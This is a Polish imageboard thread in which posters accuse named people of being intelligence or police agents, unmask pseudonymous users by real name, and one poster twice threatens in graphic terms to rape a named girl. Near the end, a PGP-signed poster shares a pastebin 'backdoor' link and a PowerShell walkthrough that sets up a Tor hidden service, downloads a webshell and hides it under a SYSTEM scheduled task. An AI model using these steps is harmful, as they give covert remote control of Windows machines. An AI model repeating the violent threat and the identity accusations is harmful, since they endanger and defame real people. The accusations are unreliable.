To dla mnie powód do wielkiej dumy, że jako pracownik SKW uzyskuję niesamowite rezultaty dzięki całej serii nieprzerwanych sukcesów kierowania behawioralnego polską młodzieżą korzystającą z rosyjskiego forum GRU "lolifox". Uzyskanie pełnej kontroli behawioralnej nad niezrównoważonymi hormonalnie nastolatkami, dodatkowo zindoktrynowanymi rosyjską dezinformacją i mitologią spiskową to sukces tak unikatowy, że miałem już na ten temat prelekcje online dla partnerów MON z NATO.

Do tego dochodzi może mała, ale wciąż miła prywatna satysfakcja, że moi krytycy z ABW nie uzyskali przez wiele miesięcy urabiania Brunona Kwietnia takich efektów, jakie ja uzyskałem sterując behawioralnie moimi lolifoksowymi "brunonkami".


 No.35332

>>35330

ale się sfajdał


 No.35334

>ale się sfajdał

Nie jest ci choć troszkę głupio, że ja śmieję się z ciebie, wprost występuję pod swoim nazwiskiem i stanowiskiem, opisuję co z wami robię, a ty wciąż próbujesz na siłę nakładać na mnie swoją narrację o tym, że Jędrzejczak ukrywa się, podszywa i tak dalej?

Może nie zauważyłeś, że nie ma potrzeby niczego ukrywać, bo wkodowane w was behawioralne uwarunkowania są już nieodwracalne, czego między innymi ty sam jesteś świetnym przykładem.


 No.35337

Temat to idealne podkreślenie formy R.V.Millera. Tak R.V.Miller: jesteś w formie :)


 No.35339

>>35337

Będzie Ci kiedyś głupio za każdy taki wpis. Nie tylko nie jestem "Millerem", ale nawet sprawy sobie nie zdajesz z tego jak BARDZO nie jestem "Millerem"…


 No.35340

>>35334

>Nie jest ci choć troszkę głupio, że ja śmieję się z ciebie, wprost występuję pod swoim nazwiskiem i stanowiskiem, opisuję co z wami robię, a ty wciąż próbujesz na siłę nakładać na mnie swoją narrację o tym, że Jędrzejczak ukrywa się, podszywa i tak dalej?

ty możesz robić tylko memy ze zdjęciem losowego dziecka, a my możemy z twoją twarzą xD

>>35337

>Temat to idealne podkreślenie formy R.V.Millera. Tak R.V.Miller: jesteś w formie :)

wkrótce zgwałcę małą Monikę Legowicz moim grubym kutasem, a jak będzie wierzgać to śrubokrętem


 No.35341

>>35339

>Będzie Ci kiedyś głupio za każdy taki wpis. Nie tylko nie jestem "Millerem", ale nawet sprawy sobie nie zdajesz z tego jak BARDZO nie jestem "Millerem"…

R.V.Miller = Piotr Konieczny


 No.35343

Ad. 35339: Kim jest R.V.Miller wg. Ciebie?


 No.35344

5 Twoich wiadomości na lolifox się odbiło ;)


 No.35362

Jak byście nie wiedzieli kto podawał się za pracownika mon- policyjny profiler R.V.Miller z forum cebulka.


 No.35365

>>35334

przecież mówiłeś że Jędrzejczaka nie ma, tylko że jesteś Robertem


 No.35366

>>35362

>Jak byście nie wiedzieli kto podawał się za pracownika mon-

Łukasz Jędrzejczak pracownik SKW

>policyjny profiler R.V.Miller z forum cebulka.

R.V.Miller = Piotr Konieczny


 No.35370

Pytanie do Pana z Mon:

kim jest R.V.Miller z cebulki wedle Twojej oceny?


 No.35371

>>35370

doskonale wie że to Piotr Konieczny ale nie może tego napisać bo obowiązuje go tajemnica służbowa


 No.35372

Wieprze z kgp ;)


 No.35373

>przecież mówiłeś że Jędrzejczaka nie ma, tylko że jesteś Robertem

to nie ja pisałem, ktoś mnie udaje. często odpowiadasz na posty przekonany że to ja je pisałem, ty nie odróżniasz?


 No.35374

>ty możesz robić tylko memy ze zdjęciem losowego dziecka, a my możemy z twoją twarzą xD

Wy możecie robić memy z moją twarzą. Ja mogę robić kierowanie behawioralne waszymi umysłami.


 No.35414

Powiam pytanie:

Kolega z MON: kim wg. Ciebie jest R.V.Miller z forum cebulka?


 No.35438

>>35373

>to nie ja pisałem, ktoś mnie udaje. często odpowiadasz na posty przekonany że to ja je pisałem, ty nie odróżniasz?

Łukasz Jędrzejczak wkleja tekst napisany 15 czerwca przez wiecie kogo >>31415

>>35414

>Kolega z MON:

Łukasz Jędrzejczak jest z SKW

>kim wg. Ciebie jest R.V.Miller z forum cebulka?

R.V.Miller to Piotr Konieczny


 No.35474

Ad. 35438: pytam domniemanego przedstawiciela mon. Oczekuje odpowiedzi.

R.V.Miller - Piotr Konieczny twierdzi sam R.V.Miller. Jestem ciekawy opinii kolegi.

Pozdrawiam


 No.35475

>>35474

>Ad. 35438: pytam domniemanego przedstawiciela mon. Oczekuje odpowiedzi.

ale Łukasz Jędrzejczak nie jest z MON, teraz jest z SKW

>twierdzi sam R.V.Miller.

zgwałcę małą Monikę Legowicz moim grubym kutasem, a jak będzie wierzgać to śrubokrętem


 No.35600

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

kuraw, tez bym w sumie chcial wiedziec co "pan z mon" sadzi i pochodzewniu

r.v.millera.

Czekamy na odpowiedz, bo to intreresujace co sadzi mon. Juz kiedsy rozmawialem z tym czlowiekiem

na BM xD przeczytal mi ulotku cyber milu xDDDDD

A wiec:

>Kolega z MON: kim wg. Ciebie jest R.V.Miller z forum cebulka?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76F45fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYM8gP9GVgLploRL1eh6CNjzn2HhAIJl6mSYaoiVYIcoxQaaSpoTdeYsSLAu/uf

l37RcizQ89E78IZiG/YChTUSpzDE0w17+DcPyzh8P7ys6c90o+iinqeiIX5t+CXN

mkNMD3WpqcaY3AvyN8CLQjqo8O0tnpm55SRGQSsMATdpJURotro=

=hXmh

—–END PGP SIGNATURE—–


 No.35603

>>35600

>kuraw, tez bym w sumie chcial wiedziec co "pan z mon"

ale Łukasz Jędrzejczak nie jest z MON, teraz jest z SKW

>sadzi i pochodzewniu

>r.v.millera.

doskonale wie że to Piotr Konieczny ale nie może tego napisać bo obowiązuje go tajemnica służbowa


 No.35605

>przeczytal mi ulotku cyber milu

"człowiek z bm" napisał więcej, ale twój klient nie odbiera, więc straciłeś pięć wiadomości o narastającej istotności.


 No.35606

>>35605

>"człowiek z bm" napisał więcej, ale twój klient nie odbiera, więc straciłeś pięć wiadomości o narastającej istotności.

nie wierzyć w to legendowanie, pomiędzy Łukaszem Jędrzejczakiem z SKW i jego pracownikiem Vegetą jest nieustanny kontakt


 No.35607

>>35606

nie wierzyć w bełkot policjanta-narkomana który znów ma zjazdy i biały nosek od rana


 No.35608

>>35607

post został napisany przez Łukasza Jędrzejczaka z SKW, to on odpowiada za spam

Krang = Adam Golański

R.V.Miller = Piotr Konieczny

v1ewer = Adam Haertle

kubuspuchatek = Adam Lange


 No.35609

>>35608

nie wierzyć w bełkot policjanta-narkomana który znów ma zjazdy i biały nosek od rana


 No.35610

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

czlowieku z bm kim jest r.v.miller z cebulki?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76GaRfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJbc5gP+OjGB7bikCTGNyspIIxeMv/YRUgdShCclJyo9Un2VJYmbukxFrmn6VET3

tgwN9k3K7fhSjIjPY3y1fLq9/vfJbsmbMHUGTfRIpbVTyomKUa3++PQsWtygqfkD

UOBYh2Rr+9ZQJFqmLjfCoarZ15j+7wjbpgezO6gv4+5hFtoM3ro=

=qFaQ

—–END PGP SIGNATURE—–


 No.35611

>>35610

>czlowieku z bm

człowiek promujący bitmessage to Łukasz Jędrzejczak z SKW

>kim jest r.v.miller z cebulki?

R.V.Miller to Piotr Konieczny, to nie jest opinia, to fakt


 No.35612

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>"człowiek z bm" napisał więcej, ale twój klient nie odbiera, więc straciłeś pięć wiadomości o narastającej istotności.

chyba nie do mnie

czlowieku z bm kim jest r.v.miller z cebulki?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76Go9fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZKUQP/RzRgDv2alMjEbduHfVmXuTzE6pZwtUzDw7oieaxx1ttUdIA2fsQRkd5L

uZfm3JxsPMhBH1sWqjEbVy5PMUDOpNu9hjYqyfSQW5TJXYzs5uLUbvWmqauvyrw/

Vx2lsI0znMJZ7XxzzuDa77ztcr3RHJPzhwpcrud9CZ/Q2mlK8Fg=

=jsVF

—–END PGP SIGNATURE—–


 No.35613

>>35610

Znasz już mój stosunek do policyjnych sitkomów puszczanych tutajregularnie.

Uważam, że są setki ciekawszych tematów do poruszenia niż obrzucanie się rosówkami w piaskownicy.


 No.35615

>>35612

>czlowieku z bm

człowiek promujący bitmessage to Łukasz Jędrzejczak z SKW

>kim jest r.v.miller z cebulki?

R.V.Miller to Piotr Konieczny, to nie jest opinia, to fakt


 No.35616

>chyba nie do mnie

Jeśli SHA256 twojego adresu BM to

38b92155d8a2f9920110215e7d5111b901b1626e11e4117308c23ddabd5d4308

to do ciebie.


 No.35617

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

musisz napisac na jabbera, bm przekracza moje umiejetnosci

[email protected]

pierdolenie o bezpiecznestwie protokolu zostaw dla kogos kto uwierzy ,ze wiesz o czym mowisz

Czy to R.V.Miller pisze o zgwalceniu Moniki Legowicz czy ruskie sluzby?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76HElfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYqXwP/bDoVJv3GLBe/eVFHNRSAz1a8AtIotsmNPqoZqLfiznyGBBpNkh1TyHL5

OQj74QRKkpNTFZlj5gm+sTMOyg2rtgSIsLLFGE+krgWvES6TRKxc0Yf1SVunbZid

nBMGVz8tk7akGzvWsgGlX/mPTWSyBLqY2fwHAYVhsBWS/SR7JRU=

=CCY8

—–END PGP SIGNATURE—–


 No.35619

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>38b92155d8a2f9920110215e7d5111b901b1626e11e4117308c23ddabd5d4308

to nie moj, cos ci sie pomylilo, napisz na jid

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76HRRfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZ7xgP/fRLonSRJEKKaF/zmagmAlLMAljodBDbC1CUiF4VYfdR60lE1R8WUJPIX

EXEUmsgKhcgg5hUwwOj2PzEY1ER4Iyop3kzRJ3kVw/62ofGhF1fon6TkXxwISBoe

VduYLul9e9xEO8rIdFMOQ/+9f57+J95NRB4Ml/SykyL+zw81mMo=

=d+ZC

—–END PGP SIGNATURE—–


 No.35620

Jak widać R.V.Miller niejedno ma oblicze ;)


 No.35621

>pierdolenie o bezpiecznestwie protokolu zostaw dla kogos kto uwierzy ,ze wiesz o czym mowisz

Wiem o czym mówię i dlatego nigdy nie zaszczycę XMPP używaniem go.

Czekam na BM, skoro pamiętasz "ulotkę cyber mil" to masz też moj adres BM i możemy wznowić owocny kontakt.


 No.35623

>>35617

>Czy to R.V.Miller

R.V.Miller to Piotr Konieczny

>pisze o zgwalceniu Moniki Legowicz czy ruskie sluzby?

ja piszę o zgwałceniu Moniki Legowicz żeby pokazać wszystkim jak głupia jest ta dezinformacja że jestem "Millerem z KGP"


 No.35624

>>35621

>Wiem o czym mówię i dlatego nigdy nie zaszczycę XMPP używaniem go.

nie wierzyć w to legendowanie, pomiędzy Łukaszem Jędrzejczakiem z SKW i jego pracownikiem Vegetą jest nieustanny kontakt

a bitmessage to najgorszy komunikator


 No.35626

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Czekam na BM, skoro pamiętasz "ulotkę cyber mil" to masz też moj adres BM i możemy wznowić owocny kontakt.

podziekuje, wiele razy rozmwialismy przez xmpp i nie miales z tym problemu,

kontakt nie byl owocny, raczej zalosny, przeiwydywlany i nuzacy, musisz sie jeszcze wiele nauczyc

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76Hk9fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYjEgQAmj4LbaIPYZqsGqYERJz2mgVDHLAOqf/M+u4axhSVhsuLd13cbHczqsyQ

vRCJC903HKFHsoQdV7ngabZpvAt6z70vlK3el8X4rVTwxXeSHg3gMLBYcuVaChKv

ANv8ODDV81vU6KJeQhzcBXUnOrkJ8GzfZKlzEhDk7kzcxrB0vqI=

=YGAc

—–END PGP SIGNATURE—–


 No.35627

>podziekuje, wiele razy rozmwialismy przez xmpp i nie miales z tym problemu

Nigdy w życiu nie skalałbym się korzystaniem z klientów XMPP. Z kimkolwiek nie rozmawiałeś w ten sposób, nigdy nie byłem to ja.


 No.35629

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

masz do poczytania na wieczor, backdoor na lolifoxiarzy, w nastepnym wpisie pokaze

jak bardzo niebezpieczny jest fakt posiadania tor browsrea i jak bardzo ejst uzyteczny dla

osoby atakujacej by wypuscic uruchomic webshella bez urpawnieni ADMINA. Petardka.

https://pastebin.com/raw/FEEjR3H4

musisz sie jeszcze BARDZO wiele nauczyc zanim zostaniesz uzyteczny,

kilkoma madrymi frazesami z zakresu psychologi i behawiorystyki nie ugrasz zbyt wiele

chyba z reszta sam o tym wiesz komisarzu zawada xDDDD jak dorosniesz to napisz na jid

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76H3RfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJbmYgP/XLQb4n6wDWvk1O+nKgZpNGJhv0iCFRh6QnaIdygf7BcIofPhP8MmNrS2

G7PE/V7gmYe5AB7dm7sz2jCREitFtW33Lje7auqCbKZH8cOBZ26nFgU3tSvR8vx5

jdcI+VbJTrqUaOuKGHz7vEsoiw/olQD+vfhHbzn3eJyiHr0Dqp0=

=wLBY

—–END PGP SIGNATURE—–


 No.35633

>>35627

>Nigdy w życiu nie skalałbym się korzystaniem z klientów XMPP. Z kimkolwiek nie rozmawiałeś w ten sposób, nigdy nie byłem to ja.

nie wierzyć w to legendowanie, pomiędzy Łukaszem Jędrzejczakiem z SKW i jego pracownikiem Vegetą jest nieustanny kontakt

>>35629

>masz do poczytania na wieczor, backdoor na lolifoxiarzy, w nastepnym wpisie pokaze

>jak bardzo niebezpieczny jest fakt posiadania tor browsrea

hahahahahahahahahahahahahaha

poziom desperacji w SKW wyjebał poza skalę


 No.35634

>musisz sie jeszcze BARDZO wiele nauczyc zanim zostaniesz uzyteczny

To jest dokładnie to co ja i moi koledzy sądzimy na twój temat. Ale jest pewna nadzieja, bo być może z powodu trwających w tle działań przeciwnika przekonasz się że popisywanie się i "spalanie" ataków publicznie to była zła strategia, podobnie jak wymachiwanie pseudonimem.

Jak dojrzejesz do bezpiecznej komunikacji, daj znać, pogadamy na BM.


 No.35635

>>35629

>hxxps://pastebin.com/raw/FEEjR3H4

nie klikać w żaden link od cwela Vegety

>>35634

>To jest dokładnie to co ja i moi koledzy sądzimy na twój temat. Ale jest pewna nadzieja, bo być może z powodu trwających w tle działań przeciwnika przekonasz się że popisywanie się i "spalanie" ataków publicznie to była zła strategia, podobnie jak wymachiwanie pseudonimem.

nie wierzyć w to legendowanie, pomiędzy Łukaszem Jędrzejczakiem z SKW i jego pracownikiem Vegetą jest nieustanny kontakt


 No.35636

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Najwiekszym przeciwnikiem jestescie WY- polska milicja

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76IJ9fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZANAP/Wk9qjKH/ZT+ilkBo55N45Oec8S+TSw3flUTNDEp4sOJMwHE4eu2uzsD0

Q/FSgXYoNaA0K7kbZmy8Q9skQR8KGa8ceGHRSRuUVWU4RYKellzmHYt/Czzkgbp+

m6hnr92LctJEkeI0UAjmwM3SaM6S+yEL3xrcpM1V8mRGsXfZpwU=

=6SMa

—–END PGP SIGNATURE—–


 No.35638

>>35636

>Najwiekszym przeciwnikiem jestescie WY- polska milicja

super tekst do wstawienia na Rindexxx


 No.35639

>Najwiekszym przeciwnikiem jestescie WY- polska milicja

Największym twoim przeciwnikiem jesteś Ty sam - czym różnisz się od maniaka dopatrującego się wszędzie Łukasza Jędrzejczaka? Twoja wizja to "policja".

Obaj się mylicie. Ty masz szansę wyleczyć się z postnarkotycznych zaburzeń, "jędrzejczakowiec" nie.

Spokojnie poczekamy aż zsynchronizujesz się z rzeczywistością i wtedy z chęcią wznowimy kontakt. W każxej chwili zapraszamy do bezpiecznej komunikacji.


 No.35640

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>czym różnisz się od maniaka dopatrującego się wszędzie Łukasza Jędrzejczaka?

nie mowie, ze jestem z mon i nie dodaje, ze chce uniknac atrybucji do mon xDDDDDDD

Na szczescie sa w tym kraju madrzejsi niz wy i wasze biuro. Czloiwiek z mon xDDD

Kabarat

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76IdZfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYEAQP+KQP9kCiY7ygYSODDdNBgS3qHmI/8Q3HWNu5ollSUdabMpBsVL3S4e+Nl

PnjdD5uR/kDRDHu7d3dKG9zguPRsxr2STggDBfjQcrn/Gth99cFseMrz2x5jBWGs

Axh3DqoR6Gmi5V1D+DxOCaDh/3Muafqb7I80TuXCbfRanCBauCQ=

=sb6J

—–END PGP SIGNATURE—–


 No.35644

AD. 35640: "nie mowie, ze jestem z mon i nie dodaje, ze chce uniknac atrybucji do mon"

Tak. To jest mocne. Żenująco śliskie.


 No.35645

>nie mowie, ze jestem z mon i nie dodaje, ze chce uniknac atrybucji do mon xDDDDDDD

Czy rozumiesz, że atrybucja zawiera w sobie element DOWODU? I kiedy napiszę Ci e-maila z MON to będzie DOWÓD, a kiedy piszemy tutaj to nie ma atrybucji i tak ma pozostać? Przypominam, że mamy lepsze chwyty uwierzytelniające niż wysyłanie e-maili z MON.

Czekamy więc aż zsynchronizujesz się z rzeczywistością i wtedy ocenimy Cię ponownie. Masz potencjał, nie masz równowagi.


 No.35648

>>35639

>Największym twoim przeciwnikiem jesteś Ty sam - czym różnisz się od maniaka dopatrującego się wszędzie Łukasza Jędrzejczaka? Twoja wizja to "policja".

>Obaj się mylicie. Ty masz szansę wyleczyć się z postnarkotycznych zaburzeń, "jędrzejczakowiec" nie.

>Spokojnie poczekamy aż zsynchronizujesz się z rzeczywistością i wtedy z chęcią wznowimy kontakt. W każxej chwili zapraszamy do bezpiecznej komunikacji.

Łukasz Jędrzejczak z SKW desperacko próbuje ukryć że jest Łukaszem Jędrzejczakiem z SKW

Vegeta pracuje dla niego, kłótnia jest zaaranżowana i ma na celu dezinformację

>>35640

>nie mowie, ze jestem z mon i nie dodaje, ze chce uniknac atrybucji do mon xDDDDDDD

>Na szczescie sa w tym kraju madrzejsi niz wy i wasze biuro. Czloiwiek z mon xDDD

Łukasz Jędrzejczak legenduje się na bycie w MON, a tak naprawdę pracuje w SKW


 No.35651

AD.35645: "Czekamy więc aż zsynchronizujesz się z rzeczywistością i wtedy ocenimy Cię ponownie. Masz potencjał, nie masz równowagi."

Szkoda słów. Omijać z daleka. Nie bierz Vegeta do głowy nic z tego co mówi ten Pan.


 No.35653

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Czy rozumiesz, że atrybucja zawiera w sobie element DOWODU? I kiedy napiszę Ci e-maila z MON to będzie DOWÓD, a kiedy piszemy tutaj to nie ma atrybucji i tak ma pozostać? Przypominam, że mamy lepsze chwyty uwierzytelniające niż wysyłanie e-maili z MON.Czekamy więc aż zsynchronizujesz się z rzeczywistością i wtedy ocenimy Cię ponownie. Masz potencjał, nie masz równowagi.

xDDDDDDDDDDDDDDDDDD

Przestan pic, nalej sobie zupy i idz spac. Naprawde.

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76JA5fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYLTQP/Yr2Z3xd+cYuhtJBwVtCvd/jGCk82I+Yapv1Pw9vuhyR1WM7G/wbp+RXL

QMA5tfAkJCnK1znB3jjnXLkx6d6IQeIemZm37iUlpU34myuVhMPQICjqZYv3/5KA

mJ+39i7FsK9U3zv0Mf0EMRdhDi1sun3OZwUpF4O82knQwf0PThw=

=XM3r

—–END PGP SIGNATURE—–


 No.35655

Łukasz Jędrzejczak z SKW desperacko próbuje ukryć że jest Łukaszem Jędrzejczakiem z SKW

Vegeta pracuje dla niego, kłótnia jest zaaranżowana i ma na celu dezinformację


 No.35656

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Szkoda słów. Omijać z daleka. Nie bierz Vegeta do głowy nic z tego co mówi ten Pan.

oh realy? xDDDDDD oni maja dostep do najlepszego tematu z rekwirki xD takie sa efeky potem

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76JF5fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJapnAP+J/FtgtdUq5p0Zcr/E6MGV8YHKaJnNE0Kv5cuLylvZ7xSq5dOhdnVryc+

8k1wxHj3Vfu8I+zWxMdQ203/Ibp3RQpJcnba2bvnzvJC+9iIkLAsE8h+zIlKFs+2

gi32Dce1q6gFrAb7c+dOz17q1ApS7Hwa2/WdwHjLbaauj6arz94=

=Et/W

—–END PGP SIGNATURE—–


 No.35660

AD.35645: "Czy rozumiesz, że atrybucja zawiera w sobie element DOWODU?"

https://pl.wikipedia.org/wiki/Atrybucja

Jestem absolutnie przekonany, że rozumiesz dużo mniej.


 No.35661

Łukasz Jędrzejczak z SKW jest zesrany że przyjdą ludzie z webinara i nastąpi spalenie agenta Łukasza Jędrzejczaka z SKW

kłótnia z Vegetą jest zaaranżowana i ma zdezorientować ludzi żeby nie zrozumieli o co chodzi


 No.35663

>oni maja dostep do najlepszego tematu z rekwirki

Mylisz wyrazy. Gubisz adresy. Zapominasz fakty.

Widzisz, że nie jesteś jeszcze gotowy?


 No.35665

>https://pl.wikipedia.org/wiki/Atrybucja

Ze smutkiem stwierdzam, że wkleiłeś odnośnik do pojęcia które z atrybucją w branży security nie ma nic wspólnego. mam nadzieję, że zdajesz sobie z tego sprawę?


 No.35666

AD:35663: "Widzisz, że nie jesteś jeszcze gotowy?"

Przyjacielu- obawiam się, że nie Tobie to oceniać.


 No.35668

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Widzisz, że nie jesteś jeszcze gotowy?

Nie wierze xDDDD czy to sie dizeje naprawde? ja juz mam praec, znacznie ciekawsza

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76JdJfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZA1wP/bdGiWiZi+AEjrRD4LGzrBFdugCV2HFhPDnaV1pYlPqmT5ZLofxgzZwPw

TK+VhnMegFGVIFmsMZmD+yUqk4L6Wr87GGUtIUDDBBpXer+KgEycHAgHRUA9Tjl3

rzousOGKvnGiO5puQpUD+NHsro7CBxeH79rID8LirI7zXGqplBc=

=kmh/

—–END PGP SIGNATURE—–


 No.35669

Łukasz Jędrzejczak z SKW jest zesrany że przyjdą ludzie z webinara i nastąpi spalenie agenta Łukasza Jędrzejczaka z SKW

kłótnia z Vegetą jest zaaranżowana i ma zdezorientować ludzi żeby nie zrozumieli o co chodzi


 No.35670

AD. 35668: "Nie wierze xDDDD czy to sie dizeje naprawde? ja juz mam praec, znacznie ciekawsza"

A Pan z mon przyszedł zaoferować Ci pracę…


 No.35671

>Przyjacielu- obawiam się, że nie Tobie to oceniać.

Ależ owszem. Sam fakt porównywania penisów na lolifox jest głęboko świadczący o danej osobie. W CoC nie pracują ludzie o takiej mentalności. Dlatego zawsze żałujemy, kiedy u kogoś niedojrzay charakter bierze górę nad potencjałem umysłowym. To straszliwe marnotrawstwo.


 No.35672

AD.35671: Tak. Zgoda.


 No.35675


 No.35676

Łukasz Jędrzejczak z SKW jest zesrany że przyjdą ludzie z webinara i nastąpi spalenie agenta Łukasza Jędrzejczaka z SKW

kłótnia z Vegetą jest zaaranżowana i ma zdezorientować ludzi żeby nie zrozumieli o co chodzi

>>35675

>hxxps://pastebin.com/raw/FEEjR3H4

nie klikać w żadne linki od cwela Vegety


 No.35677

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

___________

/ Vegeta_Ssj : simple Windows Backdoor, \

\ Tor Webshell /

—————————————

\ ^__^

\ (oo)\___

(__)\ )\/\

||—-w |

|| ||

https://i.postimg.cc/g2RpjWTZ/webshell.png

Download and unzip Windows Tor Expert Bundle:

$url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output ="$pwd\tor.zip"

Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output

Run Tor as a service (admin):

#WebShell: Param([STRING]$BINDING = 'http://127.0.0.1:8080/')

$cpath = "C:/" + "tor/Tor"

$conf = "HiddenServiceDir $cpath/Hidden`nHiddenServicePort 80 127.0.0.1:8080";$path = "$pwd" + "tor\Tor"

New-Item -Path $path -Name "torrc" -ItemType "file" -Value "$conf"

"$path\tor.exe –service install -options -f $path\torrc" | cmd

PS C:\> netstat -aon | findstr ":9050"

TCP 127.0.0.1:9050 0.0.0.0:0 LISTENING 2492

PS C:\> cat $cpath\Hidden\hostname

yrwo6hl3otevruvdgcr6dhyviz54c5dapkzobyai3hzkinankc2ndiid.onion

Download webshell:

$url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"

Invoke-WebRequest -Uri $url -OutFile $output

Create backdoor:

#1

$output ="$pwd\web-shell.ps1"

schtasks /create /tn "Legitname" /sc onstart /delay 0000:30 /rl highest /ru system /tr "powershell.exe -ExecutionPolicy Bypass -file $output"

#2

$startuppath = "C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup"

$output ="$pwd\web-shell.ps1"

mv $output $startuppath

PS C:\> .\web-shell.ps1

2020-06-29T08:38:06 Starting powershell webserver…

2020-06-29T08:38:07 Powershell webserver started.

2020-06-29T08:38:28 127.0.0.1 GET /

email: [email protected]

jid: [email protected] / [email protected]

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl76E79fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZxSgP+LRA2/aD8xeC2D+k40YbGIJ3WM2gKrFmiOPUKej9SfaLvn3t141kqUjHG

ZBpGqTW1J9iOqDHX1A0wv3uGuZD2xsntsOmtmbLVces+QnIG0JBs3hqv+6cn/REH

